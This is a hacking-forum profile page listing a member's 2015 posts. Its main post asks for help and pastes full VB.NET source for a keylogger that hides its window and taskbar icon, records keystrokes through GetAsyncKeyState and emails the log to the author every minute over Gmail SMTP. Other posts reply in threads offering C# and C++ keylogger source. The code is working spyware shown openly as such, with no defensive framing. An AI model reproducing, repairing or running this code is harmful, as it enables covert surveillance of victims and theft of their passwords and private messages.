ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!

Jump to content

Gloddox's Content

There have been 5 items by Gloddox (Search limited from May 18, 2023)


By content type

See this member's

Sort by                Order  

#672883 pleas help no idea whats wrong

Posted by Gloddox on 26 June 2015 - 02:02 PM in .NET Framework

ok that fixed the error but now it is not emailing the log any ideas?




#670318 pleas help no idea whats wrong

Posted by Gloddox on 26 June 2015 - 04:32 AM in .NET Framework

thank-you  ill give it a try when i get home




#667842 C# Keylogger (Logs to Email)

Posted by Gloddox on 25 June 2015 - 09:39 PM in Source Codes

ty




#665301 pleas help no idea whats wrong

Posted by Gloddox on 25 June 2015 - 04:33 PM in .NET Framework

i have a text box with multi line enabled, 2 timers set to true 1 is set to 60000 and second is set to 5, im in VB 2015 ,framework 4.5

i keep getting    http://i58.tinypic.com/35ji05z.jpg any advice and if you can fix it i would be vary happy.


Option Strict On
Imports System.Net.Mail
Public Class Form1
    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Long) As Integer
    Private Sub Timer1_Tick(ByVal sender As Object, ByVal e As EventArgs)

        

        Try
            Dim smtpserver As New SmtpClient
            smtpserver.EnableSsl = True
            Dim mail As New MailMessage
            smtpserver.Credentials = New Net.NetworkCredential("[email protected]", "l")
            smtpserver.Port = 465
            smtpserver.Host = "smtp.gmail.com"
            mail = New MailMessage
            mail.From = New MailAddress("[email protected]")
            mail.To.Add("[email protected]")
            mail.Subject = ("New keylogger logs!")
            mail.Body = TextBox1.Text
            smtpserver.Send(mail)
        Catch ex As Exception
            Me.Close()
        End Try
    End Sub

    Private Sub Timer2_Tick(ByVal sender As Object, ByVal e As EventArgs) Handles Timer2.Tick

      

        Dim result As Integer
        Dim key As String
        Dim i As Integer

        For i = 2 To 90
            result = 0
            result = GetAsyncKeyState(i)
            If result = -32767 Then
                key = Chr(i)
                If i = 13 Then key = vbNewLine
                Exit For
            End If
        Next i

        If key <> Nothing Then
            If My.Computer.Keyboard.ShiftKeyDown OrElse My.Computer.Keyboard.CapsLock Then
                TextBox1.Text &= key
            Else
                TextBox1.Text &= key.ToLower
            End If
        End If

        If My.Computer.Keyboard.AltKeyDown AndAlso My.Computer.Keyboard.CtrlKeyDown AndAlso key = "H" Then
            Me.Visible = True
        End If
    End Sub

    Private Sub Form1_FormClosed(ByVal sender As Object, ByVal e As FormClosedEventArgs) Handles Me.FormClosed

       

        TextBox1.Text &= vbNewLine & "Keylogger stopped at: " & Now & vbNewLine
    End Sub

    Private Sub Form1_Load(ByVal sender As Object, ByVal e As EventArgs) Handles MyBase.Load

        

        Me.ShowInTaskbar = False
        Me.ShowIcon = False
        Me.Visible = False
        TextBox1.Text = "keylogger started at: " & Now & vbNewLine


    End Sub
End Class



#665037 MPLogger C++ Keylogger Source

Posted by Gloddox on 25 June 2015 - 03:56 PM in Source Codes

ill try it